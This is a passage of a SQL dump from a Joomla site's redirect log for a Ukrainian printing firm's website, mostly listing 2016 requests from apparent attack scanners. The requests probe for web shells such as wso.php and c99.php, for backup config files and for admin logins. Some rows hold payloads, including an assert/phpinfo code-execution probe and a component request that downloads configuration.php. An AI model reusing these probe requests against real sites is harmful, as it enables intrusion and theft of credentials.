00:00:00',301),(1142,'http://ekvatorprint.com.ua/images/grener.php','','http://ekvatorprint.com.ua/images/grener.php','',1,0,'2016-04-27 09:59:54','0000-00-00 00:00:00',301),(1143,'http://ekvatorprint.com.ua/images/was-wp.php','','http://ekvatorprint.com.ua/images/was-wp.php','',1,0,'2016-04-27 09:59:54','0000-00-00 00:00:00',301),(1144,'http://ekvatorprint.com.ua/images/google_36433648452081.php','','http://ekvatorprint.com.ua/images/google_36433648452081.php','',1,0,'2016-04-27 09:59:54','0000-00-00 00:00:00',301),(1145,'http://ekvatorprint.com.ua/includes/database/mysql/sys.php','','http://ekvatorprint.com.ua/includes/database/mysql/sys.php','',1,0,'2016-04-27 09:59:54','0000-00-00 00:00:00',301),(1146,'http://ekvatorprint.com.ua/language/en-gb/wpconfig-new.php','','http://ekvatorprint.com.ua/language/en-gb/wpconfig-new.php','',1,0,'2016-04-27 09:59:54','0000-00-00 00:00:00',301),(1147,'http://ekvatorprint.com.ua/language/th-th/license.php','','http://ekvatorprint.com.ua/language/th-th/license.php','',1,0,'2016-04-27 09:59:54','0000-00-00 00:00:00',301),(1148,'http://ekvatorprint.com.ua/images/j.php','','http://ekvatorprint.com.ua/images/j.php','',1,0,'2016-04-27 09:59:54','0000-00-00 00:00:00',301),(1149,'http://ekvatorprint.com.ua/images/web.php','','http://ekvatorprint.com.ua/images/web.php','',1,0,'2016-04-27 09:59:55','0000-00-00 00:00:00',301),(1150,'http://ekvatorprint.com.ua/includes/incllude.php','','http://ekvatorprint.com.ua/includes/incllude.php','',1,0,'2016-04-27 09:59:55','0000-00-00 00:00:00',301),(1151,'http://ekvatorprint.com.ua/includes/secure.php','','http://ekvatorprint.com.ua/includes/secure.php','',1,0,'2016-04-27 09:59:55','0000-00-00 00:00:00',301),(1152,'http://ekvatorprint.com.ua/language/overrides/license.php','','http://ekvatorprint.com.ua/language/overrides/license.php','',1,0,'2016-04-27 09:59:55','0000-00-00 00:00:00',301),(1153,'http://ekvatorprint.com.ua/includes/infi.php','','http://ekvatorprint.com.ua/includes/infi.php','',1,0,'2016-04-27 09:59:55','0000-00-00 00:00:00',301),(1154,'http://ekvatorprint.com.ua/libraries/cms/form/secure.php','','http://ekvatorprint.com.ua/libraries/cms/form/secure.php','',1,0,'2016-04-27 09:59:55','0000-00-00 00:00:00',301),(1155,'http://ekvatorprint.com.ua/libraries/cms/dispacher.php','','http://ekvatorprint.com.ua/libraries/cms/dispacher.php','',1,0,'2016-04-27 09:59:55','0000-00-00 00:00:00',301),(1156,'http://ekvatorprint.com.ua/images/stories/demo/secure.php','','http://ekvatorprint.com.ua/images/stories/demo/secure.php','',1,0,'2016-04-27 09:59:56','0000-00-00 00:00:00',301),(1157,'http://ekvatorprint.com.ua/libraries/joomla/dispacher.php','','http://ekvatorprint.com.ua/libraries/joomla/dispacher.php','',1,0,'2016-04-27 10:00:16','0000-00-00 00:00:00',301),(1158,'http://ekvatorprint.com.ua/libraries/joomla/html/toolbar/main.php','','http://ekvatorprint.com.ua/libraries/joomla/html/toolbar/main.php','',1,0,'2016-04-27 10:00:16','0000-00-00 00:00:00',301),(1159,'http://ekvatorprint.com.ua/libraries/joomla/html/core.php','','http://ekvatorprint.com.ua/libraries/joomla/html/core.php','',1,0,'2016-04-27 10:00:16','0000-00-00 00:00:00',301),(1160,'http://ekvatorprint.com.ua/libraries/joomla/html/parameter/element/thumbs.php','','http://ekvatorprint.com.ua/libraries/joomla/html/parameter/element/thumbs.php','',1,0,'2016-04-27 10:00:16','0000-00-00 00:00:00',301),(1161,'http://ekvatorprint.com.ua/logs/mainplag.php','','http://ekvatorprint.com.ua/logs/mainplag.php','',1,0,'2016-04-27 10:00:16','0000-00-00 00:00:00',301),(1162,'http://ekvatorprint.com.ua/libraries/joomla/access/wp-error.php','','http://ekvatorprint.com.ua/libraries/joomla/access/wp-error.php','',1,0,'2016-04-27 10:00:16','0000-00-00 00:00:00',301),(1163,'http://ekvatorprint.com.ua/libraries/joomla/environment/wp-error.php','','http://ekvatorprint.com.ua/libraries/joomla/environment/wp-error.php','',1,0,'2016-04-27 10:00:17','0000-00-00 00:00:00',301),(1164,'http://ekvatorprint.com.ua/libraries/cms/language/wp-error.php','','http://ekvatorprint.com.ua/libraries/cms/language/wp-error.php','',1,0,'2016-04-27 10:00:17','0000-00-00 00:00:00',301),(1165,'http://ekvatorprint.com.ua/libraries/phputf8/native/wp-error.php','','http://ekvatorprint.com.ua/libraries/phputf8/native/wp-error.php','',1,0,'2016-04-27 10:00:17','0000-00-00 00:00:00',301),(1166,'http://ekvatorprint.com.ua/libraries/phputf8/dispacher.php','','http://ekvatorprint.com.ua/libraries/phputf8/dispacher.php','',1,0,'2016-04-27 10:00:18','0000-00-00 00:00:00',301),(1167,'http://ekvatorprint.com.ua/media/cms/dispacher.php','','http://ekvatorprint.com.ua/media/cms/dispacher.php','',1,0,'2016-04-27 10:00:18','0000-00-00 00:00:00',301),(1168,'http://ekvatorprint.com.ua/libraries/simplepie/wp-xmlrpc.php/modules/mod_enrola/main.php','','http://ekvatorprint.com.ua/libraries/simplepie/wp-xmlrpc.php/modules/mod_enrola/main.php','',1,0,'2016-04-27 10:00:18','0000-00-00 00:00:00',301),(1169,'http://ekvatorprint.com.ua/libraries/simplepie/idn/wso.php','','http://ekvatorprint.com.ua/libraries/simplepie/idn/wso.php','',1,0,'2016-04-27 10:00:18','0000-00-00 00:00:00',301),(1170,'http://ekvatorprint.com.ua/libraries/simplepie/idn/c99.php','','http://ekvatorprint.com.ua/libraries/simplepie/idn/c99.php','',1,0,'2016-04-27 10:00:19','0000-00-00 00:00:00',301),(1171,'http://ekvatorprint.com.ua/libraries/simplepie/idn/syslib.php','','http://ekvatorprint.com.ua/libraries/simplepie/idn/syslib.php','',1,0,'2016-04-27 10:00:19','0000-00-00 00:00:00',301),(1172,'http://ekvatorprint.com.ua/media/jui/dispacher.php','','http://ekvatorprint.com.ua/media/jui/dispacher.php','',1,0,'2016-04-27 10:00:36','0000-00-00 00:00:00',301),(1173,'http://ekvatorprint.com.ua/media/media/dispacher.php','','http://ekvatorprint.com.ua/media/media/dispacher.php','',1,0,'2016-04-27 10:00:36','0000-00-00 00:00:00',301),(1174,'http://ekvatorprint.com.ua/modules/mod_articles_archive/dispacher.php','','http://ekvatorprint.com.ua/modules/mod_articles_archive/dispacher.php','',1,0,'2016-04-27 10:00:36','0000-00-00 00:00:00',301),(1175,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/advhr/css/main.php/plugins/content/dispacher.php','','http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/advhr/css/main.php/plugins/content/dispacher.php','',1,0,'2016-04-27 10:00:36','0000-00-00 00:00:00',301),(1176,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/img/page.php','','http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/img/page.php','',1,0,'2016-04-27 10:00:36','0000-00-00 00:00:00',301),(1177,'http://ekvatorprint.com.ua/media/contacts/dispacher.php','','http://ekvatorprint.com.ua/media/contacts/dispacher.php','',1,0,'2016-04-27 10:00:36','0000-00-00 00:00:00',301),(1178,'http://ekvatorprint.com.ua/media/mod_languages/wpconfig-new.php','','http://ekvatorprint.com.ua/media/mod_languages/wpconfig-new.php','',1,0,'2016-04-27 10:00:36','0000-00-00 00:00:00',301),(1179,'http://ekvatorprint.com.ua/modules/mod_articles_categories/dispacher.php','','http://ekvatorprint.com.ua/modules/mod_articles_categories/dispacher.php','',1,0,'2016-04-27 10:00:36','0000-00-00 00:00:00',301),(1180,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/img.php','','http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/img.php','',1,0,'2016-04-27 10:00:36','0000-00-00 00:00:00',301),(1181,'http://ekvatorprint.com.ua/media/mod_languages/images/wp-error.php','','http://ekvatorprint.com.ua/media/mod_languages/images/wp-error.php','',1,0,'2016-04-27 10:00:36','0000-00-00 00:00:00',301),(1182,'http://ekvatorprint.com.ua/media/com_joomlaupdate/dispacher.php','','http://ekvatorprint.com.ua/media/com_joomlaupdate/dispacher.php','',1,0,'2016-04-27 10:00:36','0000-00-00 00:00:00',301),(1183,'http://ekvatorprint.com.ua/media/poll.php','','http://ekvatorprint.com.ua/media/poll.php','',1,0,'2016-04-27 10:00:37','0000-00-00 00:00:00',301),(1184,'http://ekvatorprint.com.ua/modules/mod_araticlws/license.php','','http://ekvatorprint.com.ua/modules/mod_araticlws/license.php','',1,0,'2016-04-27 10:00:37','0000-00-00 00:00:00',301),(1185,'http://ekvatorprint.com.ua/media/com_finder/css/wp-error.php','','http://ekvatorprint.com.ua/media/com_finder/css/wp-error.php','',1,0,'2016-04-27 10:00:37','0000-00-00 00:00:00',301),(1186,'http://ekvatorprint.com.ua/media/system/css/wp-error.php','','http://ekvatorprint.com.ua/media/system/css/wp-error.php','',1,0,'2016-04-27 10:00:37','0000-00-00 00:00:00',301),(1187,'http://ekvatorprint.com.ua/modules/mod_custom/dispacher.php','','http://ekvatorprint.com.ua/modules/mod_custom/dispacher.php','',1,0,'2016-04-27 10:00:56','0000-00-00 00:00:00',301),(1188,'http://ekvatorprint.com.ua/modules/mod_custom/wpconfig-new.php','','http://ekvatorprint.com.ua/modules/mod_custom/wpconfig-new.php','',1,0,'2016-04-27 10:00:56','0000-00-00 00:00:00',301),(1189,'http://ekvatorprint.com.ua/modules/mod_footer/wp-xmlrpc.php','','http://ekvatorprint.com.ua/modules/mod_footer/wp-xmlrpc.php','',1,0,'2016-04-27 10:00:56','0000-00-00 00:00:00',301),(1190,'http://ekvatorprint.com.ua/modules/mod_login/wp-xmlrpc.php','','http://ekvatorprint.com.ua/modules/mod_login/wp-xmlrpc.php','',1,0,'2016-04-27 10:00:56','0000-00-00 00:00:00',301),(1191,'http://ekvatorprint.com.ua/modules/mod_breadcrumbs/dispacher.php','','http://ekvatorprint.com.ua/modules/mod_breadcrumbs/dispacher.php','',1,0,'2016-04-27 10:00:56','0000-00-00 00:00:00',301),(1192,'http://ekvatorprint.com.ua/modules/mod_googlemapsapi/mod_googlemapsapi.php','','http://ekvatorprint.com.ua/modules/mod_googlemapsapi/mod_googlemapsapi.php','',2,0,'2016-04-27 10:00:57','0000-00-00 00:00:00',301),(1193,'http://ekvatorprint.com.ua/modules/mod_feed/dispacher.php','','http://ekvatorprint.com.ua/modules/mod_feed/dispacher.php','',1,0,'2016-04-27 10:00:57','0000-00-00 00:00:00',301),(1194,'http://ekvatorprint.com.ua/modules/mod_banners/dispacher.php','','http://ekvatorprint.com.ua/modules/mod_banners/dispacher.php','',1,0,'2016-04-27 10:00:57','0000-00-00 00:00:00',301),(1195,'http://ekvatorprint.com.ua/modules/mod_articles_latest/dispacher.php','','http://ekvatorprint.com.ua/modules/mod_articles_latest/dispacher.php','',1,0,'2016-04-27 10:00:57','0000-00-00 00:00:00',301),(1196,'http://ekvatorprint.com.ua/modules/mod_banners/cache.php','','http://ekvatorprint.com.ua/modules/mod_banners/cache.php','',1,0,'2016-04-27 10:00:57','0000-00-00 00:00:00',301),(1197,'http://ekvatorprint.com.ua/modules/mod_login/dispacher.php','','http://ekvatorprint.com.ua/modules/mod_login/dispacher.php','',1,0,'2016-04-27 10:00:57','0000-00-00 00:00:00',301),(1198,'http://ekvatorprint.com.ua/modules/mod_menu/dispacher.php','','http://ekvatorprint.com.ua/modules/mod_menu/dispacher.php','',1,0,'2016-04-27 10:00:57','0000-00-00 00:00:00',301),(1199,'http://ekvatorprint.com.ua/modules/mod_custom/wp-xmlrpc.php','','http://ekvatorprint.com.ua/modules/mod_custom/wp-xmlrpc.php','',1,0,'2016-04-27 10:00:57','0000-00-00 00:00:00',301),(1200,'http://ekvatorprint.com.ua/modules/mod_random_image/wp-xmlrpc.php','','http://ekvatorprint.com.ua/modules/mod_random_image/wp-xmlrpc.php','',1,0,'2016-04-27 10:00:58','0000-00-00 00:00:00',301),(1201,'http://ekvatorprint.com.ua/modules/mod_articles_news/dispacher.php','','http://ekvatorprint.com.ua/modules/mod_articles_news/dispacher.php','',1,0,'2016-04-27 10:00:58','0000-00-00 00:00:00',301),(1202,'http://ekvatorprint.com.ua/plugins/authentication/wp-xmlrpc.php','','http://ekvatorprint.com.ua/plugins/authentication/wp-xmlrpc.php','',1,0,'2016-04-27 10:01:20','0000-00-00 00:00:00',301),(1203,'http://ekvatorprint.com.ua/modules/mod_searchmenu/ir.php','','http://ekvatorprint.com.ua/modules/mod_searchmenu/ir.php','',1,0,'2016-04-27 10:01:20','0000-00-00 00:00:00',301),(1204,'http://ekvatorprint.com.ua/modules/mod_related_items/wp-xmlrpc.php','','http://ekvatorprint.com.ua/modules/mod_related_items/wp-xmlrpc.php','',1,0,'2016-04-27 10:01:20','0000-00-00 00:00:00',301),(1205,'http://ekvatorprint.com.ua/modules/mod_search/wpconfig-new.php','','http://ekvatorprint.com.ua/modules/mod_search/wpconfig-new.php','',1,0,'2016-04-27 10:01:20','0000-00-00 00:00:00',301),(1206,'http://ekvatorprint.com.ua/modules/mod_wrapper/dispacher.php','','http://ekvatorprint.com.ua/modules/mod_wrapper/dispacher.php','',1,0,'2016-04-27 10:01:20','0000-00-00 00:00:00',301),(1207,'http://ekvatorprint.com.ua/modules/mod_users_latest/wpconfig-new.php','','http://ekvatorprint.com.ua/modules/mod_users_latest/wpconfig-new.php','',1,0,'2016-04-27 10:01:21','0000-00-00 00:00:00',301),(1208,'http://ekvatorprint.com.ua/modules/mod_syndicate/dispacher.php','','http://ekvatorprint.com.ua/modules/mod_syndicate/dispacher.php','',1,0,'2016-04-27 10:01:21','0000-00-00 00:00:00',301),(1209,'http://ekvatorprint.com.ua/modules/mod_weblinks/wpconfig-new.php','','http://ekvatorprint.com.ua/modules/mod_weblinks/wpconfig-new.php','',1,0,'2016-04-27 10:01:21','0000-00-00 00:00:00',301),(1210,'http://ekvatorprint.com.ua/modules/mod_txprev/libraries/archives.php','','http://ekvatorprint.com.ua/modules/mod_txprev/libraries/archives.php','',3,0,'2016-04-27 10:01:21','0000-00-00 00:00:00',301),(1211,'http://ekvatorprint.com.ua/modules/mod_whosonline/wpconfig-new.php','','http://ekvatorprint.com.ua/modules/mod_whosonline/wpconfig-new.php','',1,0,'2016-04-27 10:01:22','0000-00-00 00:00:00',301),(1212,'http://ekvatorprint.com.ua/modules/mod_syndicate/wpconfig-new.php','','http://ekvatorprint.com.ua/modules/mod_syndicate/wpconfig-new.php','',1,0,'2016-04-27 10:01:22','0000-00-00 00:00:00',301),(1213,'http://ekvatorprint.com.ua/modules/mod_search/wp-xmlrpc.php','','http://ekvatorprint.com.ua/modules/mod_search/wp-xmlrpc.php','',1,0,'2016-04-27 10:01:22','0000-00-00 00:00:00',301),(1214,'http://ekvatorprint.com.ua/plugins/content/apismtp/configsite.php','','http://ekvatorprint.com.ua/plugins/content/apismtp/configsite.php','',1,0,'2016-04-27 10:01:22','0000-00-00 00:00:00',301),(1215,'http://ekvatorprint.com.ua/modules/online/online.php','','http://ekvatorprint.com.ua/modules/online/online.php','',1,0,'2016-04-27 10:01:23','0000-00-00 00:00:00',301),(1216,'http://ekvatorprint.com.ua/modules/mod_related_items/dispacher.php','','http://ekvatorprint.com.ua/modules/mod_related_items/dispacher.php','',1,0,'2016-04-27 10:01:23','0000-00-00 00:00:00',301),(1217,'http://ekvatorprint.com.ua/templates/atomic/web-info.php','','http://ekvatorprint.com.ua/templates/atomic/web-info.php','',1,0,'2016-04-27 10:02:40','0000-00-00 00:00:00',301),(1218,'http://ekvatorprint.com.ua/templates/atomic/data2.php','','http://ekvatorprint.com.ua/templates/atomic/data2.php','',1,0,'2016-04-27 10:02:40','0000-00-00 00:00:00',301),(1219,'http://ekvatorprint.com.ua/plugins/user/dispacher.php','','http://ekvatorprint.com.ua/plugins/user/dispacher.php','',1,0,'2016-04-27 10:02:40','0000-00-00 00:00:00',301),(1220,'http://ekvatorprint.com.ua/plugins/system/anticopy/wp-error.php','','http://ekvatorprint.com.ua/plugins/system/anticopy/wp-error.php','',1,0,'2016-04-27 10:02:40','0000-00-00 00:00:00',301),(1221,'http://ekvatorprint.com.ua/plugins/system/dispacher.php','','http://ekvatorprint.com.ua/plugins/system/dispacher.php','',1,0,'2016-04-27 10:02:41','0000-00-00 00:00:00',301),(1222,'http://ekvatorprint.com.ua/templates/beez/html/com_user/remind/thumbs.php','','http://ekvatorprint.com.ua/templates/beez/html/com_user/remind/thumbs.php','',1,0,'2016-04-27 10:02:41','0000-00-00 00:00:00',301),(1223,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/img/mod_joomlasec.php','','http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/img/mod_joomlasec.php','',1,0,'2016-04-27 10:02:41','0000-00-00 00:00:00',301),(1224,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/voice.php','','http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/voice.php','',1,0,'2016-04-27 10:02:41','0000-00-00 00:00:00',301),(1225,'http://ekvatorprint.com.ua/plugins/secure.php','','http://ekvatorprint.com.ua/plugins/secure.php','',1,0,'2016-04-27 10:02:41','0000-00-00 00:00:00',301),(1226,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/o2k7/img/mod_joomlasec.php','','http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/o2k7/img/mod_joomlasec.php','',1,0,'2016-04-27 10:02:41','0000-00-00 00:00:00',301),(1227,'http://ekvatorprint.com.ua/templates/beez5/libs.php','','http://ekvatorprint.com.ua/templates/beez5/libs.php','',1,0,'2016-04-27 10:02:41','0000-00-00 00:00:00',301),(1228,'http://ekvatorprint.com.ua/plugins/search/wpconfig-new.php','','http://ekvatorprint.com.ua/plugins/search/wpconfig-new.php','',1,0,'2016-04-27 10:02:41','0000-00-00 00:00:00',301),(1229,'http://ekvatorprint.com.ua/templates/beez/html/com_poll/poll/thumbs.php','','http://ekvatorprint.com.ua/templates/beez/html/com_poll/poll/thumbs.php','',1,0,'2016-04-27 10:02:41','0000-00-00 00:00:00',301),(1230,'http://ekvatorprint.com.ua/templates/atomic/maink.php','','http://ekvatorprint.com.ua/templates/atomic/maink.php','',1,0,'2016-04-27 10:02:41','0000-00-00 00:00:00',301),(1231,'http://ekvatorprint.com.ua/templates/beez3/panel.php','','http://ekvatorprint.com.ua/templates/beez3/panel.php','',1,0,'2016-04-27 10:02:41','0000-00-00 00:00:00',301),(1232,'http://ekvatorprint.com.ua/tmp/fjf7492jdsu.php','','http://ekvatorprint.com.ua/tmp/fjf7492jdsu.php','',1,0,'2016-04-27 10:03:22','0000-00-00 00:00:00',301),(1233,'http://ekvatorprint.com.ua/tmp/mainplag.php','','http://ekvatorprint.com.ua/tmp/mainplag.php','',1,0,'2016-04-27 10:03:22','0000-00-00 00:00:00',301),(1234,'http://ekvatorprint.com.ua/tmp/attached.php','','http://ekvatorprint.com.ua/tmp/attached.php','',1,0,'2016-04-27 10:03:22','0000-00-00 00:00:00',301),(1235,'http://ekvatorprint.com.ua/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=4518&STRMVER=4&CAPREQ=0','','','',2,0,'2016-04-27 13:11:49','0000-00-00 00:00:00',301),(1236,'http://ekvatorprint.com.ua/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=4518&STRMVER=4&CAPREQ=0','','','',2,0,'2016-04-27 13:11:50','0000-00-00 00:00:00',301),(1237,'http://ekvatorprint.com.ua/printing-in-doneck/','','http://htn.su/hardware/spectehnika/2014-06-27/8836-shirokoformatnaya-pechat-v-donecke.html','',180,0,'2016-04-28 08:44:34','0000-00-00 00:00:00',301),(1238,'http://ekvatorprint.com.ua/administrator/images/modulnie kartini/мк-108.png','','http://ekvatorprint.com.ua/administrator/index.php?option=com_jce&view=editor&layout=plugin&plugin=imgmanager&3629673623a0a2c8b32b4281f14ee87f=1&component_id=22','',1,0,'2016-04-28 10:06:09','0000-00-00 00:00:00',301),(1239,'http://ekvatorprint.com.ua/index.php?option=com_cckjse­blod&task=download&file=configuration.php','','','',1,0,'2016-04-28 13:24:18','0000-00-00 00:00:00',301),(1240,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-111.png','','','',3,0,'2016-05-03 19:42:20','0000-00-00 00:00:00',301),(1241,'http://ekvatorprint.com.ua//favicon.ico','','','',1,0,'2016-05-03 22:44:52','0000-00-00 00:00:00',301),(1242,'http://ekvatorprint.com.ua/printing-in-doneck','','https://www.google.com.ua/','',71,0,'2016-05-04 06:16:32','0000-00-00 00:00:00',301),(1243,'http://ekvatorprint.com.ua/portfolio/6-fotooboi/detail/24-fotooboi-1?tmpl=component','','','',6,0,'2016-05-04 14:07:47','0000-00-00 00:00:00',301),(1244,'http://ekvatorprint.com.ua/plotternaya-podrezka','','http://ekvatorprint.com.ua/','',1,0,'2016-05-05 07:58:34','0000-00-00 00:00:00',301),(1245,'http://ekvatorprint.com.ua/plotternaya-porezka','','http://ekvatorprint.com.ua/','',2,0,'2016-05-05 07:58:46','0000-00-00 00:00:00',301),(1246,'http://ekvatorprint.com.ua/templates/gk_ilife/lib/scripts/menu.php?style=moomenu&width=1&height=1&opacity=1&animation=1&speed=500','','http://ekvatorprint.com.ua/plotternaya-podrezka','',83166,0,'2016-05-05 15:06:16','0000-00-00 00:00:00',301),(1247,'http://ekvatorprint.com.ua/?option=com_content&view=article&id=16&Itemid=17','','','',12,0,'2016-05-05 17:24:52','0000-00-00 00:00:00',301),(1248,'http://ekvatorprint.com.ua/administrator/images/modulnie kartini/мк-114.png','','http://ekvatorprint.com.ua/administrator/index.php?option=com_jce&view=editor&layout=plugin&plugin=imgmanager&d79700b60fdfbffa4d75bcfc5e8f7940=1&component_id=22','',1,0,'2016-05-06 12:24:23','0000-00-00 00:00:00',301),(1249,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-117.png','','','',8,0,'2016-05-06 17:49:07','0000-00-00 00:00:00',301),(1250,'http://ekvatorprint.com.ua/plugins/log.php','','','',3,0,'2016-05-08 07:24:11','0000-00-00 00:00:00',301),(1251,'http://ekvatorprint.com.ua/trebovaniya&h=wAQGqriVl','','','',1,0,'2016-05-09 14:48:39','0000-00-00 00:00:00',301),(1252,'http://ekvatorprint.com.ua/contaeect/','','','',1,0,'2016-05-10 10:36:46','0000-00-00 00:00:00',301),(1253,'http://ekvatorprint.com.ua/tmp/sfx.php','','','',13,0,'2016-05-11 07:11:06','0000-00-00 00:00:00',301),(1254,'http://ekvatorprint.com.ua/media/media.php?1=assert&2=phpinfo();','','','',1,0,'2016-05-11 07:38:15','0000-00-00 00:00:00',301),(1255,'http://ekvatorprint.com.ua/administrator/administrator.php','','','',11,0,'2016-05-11 10:30:23','0000-00-00 00:00:00',301),(1256,'http://ekvatorprint.com.ua/cache/cachee.php','','','',8,0,'2016-05-11 11:54:19','0000-00-00 00:00:00',301),(1257,'http://ekvatorprint.com.ua/templates/gk_ilife/wp-login.php','','','',1,0,'2016-05-11 13:45:40','0000-00-00 00:00:00',301),(1258,'http://ekvatorprint.com.ua/media/plg_content_mavikthumbnails/slimbox2/css/administrator/index.php','','','',1,0,'2016-05-11 13:45:45','0000-00-00 00:00:00',301),(1259,'http://ekvatorprint.com.ua/plugins/system/jcemediabox/css/wp-login.php','','','',1,0,'2016-05-11 13:45:47','0000-00-00 00:00:00',301),(1260,'http://ekvatorprint.com.ua/plugins/system/jcemediabox/css/administrator/index.php','','','',1,0,'2016-05-11 13:45:49','0000-00-00 00:00:00',301),(1261,'http://ekvatorprint.com.ua/plugins/system/jcemediabox/themes/standard/css/administrator/index.php','','','',1,0,'2016-05-11 13:45:52','0000-00-00 00:00:00',301),(1262,'http://ekvatorprint.com.ua/templates/system/css/wp-login.php','','','',1,0,'2016-05-11 13:45:54','0000-00-00 00:00:00',301),(1263,'http://ekvatorprint.com.ua/images/wp-login.php','','','',1,0,'2016-05-11 13:45:59','0000-00-00 00:00:00',301),(1264,'http://ekvatorprint.com.ua/templates/gk_ilife/css/administrator/index.php','','','',1,0,'2016-05-11 13:46:05','0000-00-00 00:00:00',301),(1265,'http://ekvatorprint.com.ua/images/stories/wp-login.php','','','',1,0,'2016-05-11 13:46:06','0000-00-00 00:00:00',301),(1266,'http://ekvatorprint.com.ua/images/stories/administrator/index.php','','','',1,0,'2016-05-11 13:46:07','0000-00-00 00:00:00',301),(1267,'http://ekvatorprint.com.ua/printing-in-kharkov/administrator/index.php','','','',1,0,'2016-05-11 13:46:11','0000-00-00 00:00:00',301),(1268,'http://ekvatorprint.com.ua/printing-in-kyiv/wp-login.php','','','',1,0,'2016-05-11 13:46:12','0000-00-00 00:00:00',301),(1269,'http://ekvatorprint.com.ua/printing-in-kyiv/administrator/index.php','','','',1,0,'2016-05-11 13:46:14','0000-00-00 00:00:00',301),(1270,'http://ekvatorprint.com.ua/printing-in-dnepropetrovsk/wp-login.php','','','',1,0,'2016-05-11 13:46:16','0000-00-00 00:00:00',301),(1271,'http://ekvatorprint.com.ua/printing-in-dnepropetrovsk/administrator/index.php','','','',1,0,'2016-05-11 13:46:17','0000-00-00 00:00:00',301),(1272,'http://ekvatorprint.com.ua/printing-in-zaporozhje/administrator/index.php','','','',1,0,'2016-05-11 13:46:20','0000-00-00 00:00:00',301),(1273,'http://ekvatorprint.com.ua/printing-in-odessa/wp-login.php','','','',1,0,'2016-05-11 13:46:22','0000-00-00 00:00:00',301),(1274,'http://ekvatorprint.com.ua/printing-in-odessa/administrator/index.php','','','',1,0,'2016-05-11 13:46:23','0000-00-00 00:00:00',301),(1275,'http://ekvatorprint.com.ua/images/portfolio/Bannera/administrator/index.php','','','',1,0,'2016-05-11 13:46:27','0000-00-00 00:00:00',301),(1276,'http://ekvatorprint.com.ua/images/stories/kreativnaja-reklama/bilbord/administrator/index.php','','','',1,0,'2016-05-11 13:46:30','0000-00-00 00:00:00',301),(1277,'http://ekvatorprint.com.ua/images/stories/kreativnaja-reklama/avto/wp-login.php','','','',1,0,'2016-05-11 13:46:32','0000-00-00 00:00:00',301),(1278,'http://ekvatorprint.com.ua/installation/index.php','','','',15,0,'2016-05-11 15:07:29','0000-00-00 00:00:00',301),(1279,'http://ekvatorprint.com.ua/libraries/joomla/application/upload.php?wphp4','','','',1,0,'2016-05-12 05:47:24','0000-00-00 00:00:00',301),(1280,'http://ekvatorprint.com.ua/modules/mod_feed/tmpl/mod_feed.php?ms-load=ygh7k','','','',1,0,'2016-05-12 06:23:43','0000-00-00 00:00:00',301),(1281,'http://ekvatorprint.com.ua/webconfig.txt.php','','','',10,0,'2016-05-12 07:35:54','0000-00-00 00:00:00',301),(1282,'http://ekvatorprint.com.ua/plugins/user/pre.php','','','',2,0,'2016-05-12 07:35:59','0000-00-00 00:00:00',301),(1283,'http://ekvatorprint.com.ua/configurationbak.php','','','',14,0,'2016-05-12 07:45:24','0000-00-00 00:00:00',301),(1284,'http://ekvatorprint.com.ua/images/phocagallery/Fotooboi/thumbs/phoca_thumb_l_Fotooboi-3.jpg','','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1052.3qq_hQ_6FuYLtGUoi3UYSupEYWX65mTRjIQYZNT6REktfzRlfFXArZLKLHJHpROj.ca1149a7bf42b9a4d3469adaa43dffd200b32e91&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YD4hgzqAYr5iuWBiLZQy-rY&data=UlNrNmk5WktYejR0eWJFYk1LdmtxaTdkQXQyNnpWd3I1bWR4aXVLckJCeTNjZTNxMWVkTlc0YkRlU2RWa1IwSGhrdGNXUGdmTEJtOHh6cnNoSVBSRXB4bTBCcEFIOWRIUGN6Zm5XTDFDR3BDRUFWbVBVZ3NEdmJucTJpY2ZmTjhHUXo1aFdvdXpzbDFpZG1mcXJPNDRNa1d1MGFsS0tSLUdhczYtQ3dEQm5BbVMyWGdKX0VjZGl4d1pVRmhkRy14TzZmeFZuc1BSaTg&b64e=2&sign=981f586b05c96c2b1ceeef1a1b3a4f31&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYpgPUyh7uQlUc-uQHetL1xK0_ydsnEPyS3HtKFouoRiFWuTbFEejhPWZak8CbfqXi83L_ZMhSRmLXdSj6Zm51OUQK1zTqQ9b8wxk1C09hiX8YnR2atgVIQ4_xehFh7lBO68QgXF7Tj6&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXmyCrj7VrKuDAsescQkkauUmi1qntaR7tzv8OEtAfumxRG3vu4lnSSgwR1iTRUgphOzwYkIgBQN1fJsXES71zx&l10n=ru&cts=1463067834368&mc=4.11804885805','',2,0,'2016-05-12 16:02:51','0000-00-00 00:00:00',301),(1285,'http://ekvatorprint.com.ua/sqlbak.php','','http://www.googlebot.com/bot.html','',1,0,'2016-05-12 18:19:58','0000-00-00 00:00:00',301),(1286,'http://ekvatorprint.com.ua/index.php?option=com_content&view=article&id=16&Itemid=17','','','',40,0,'2016-05-14 06:09:10','0000-00-00 00:00:00',301),(1287,'http://ekvatorprint.com.ua/wp-config.php~','','','',11,0,'2016-05-14 17:28:05','0000-00-00 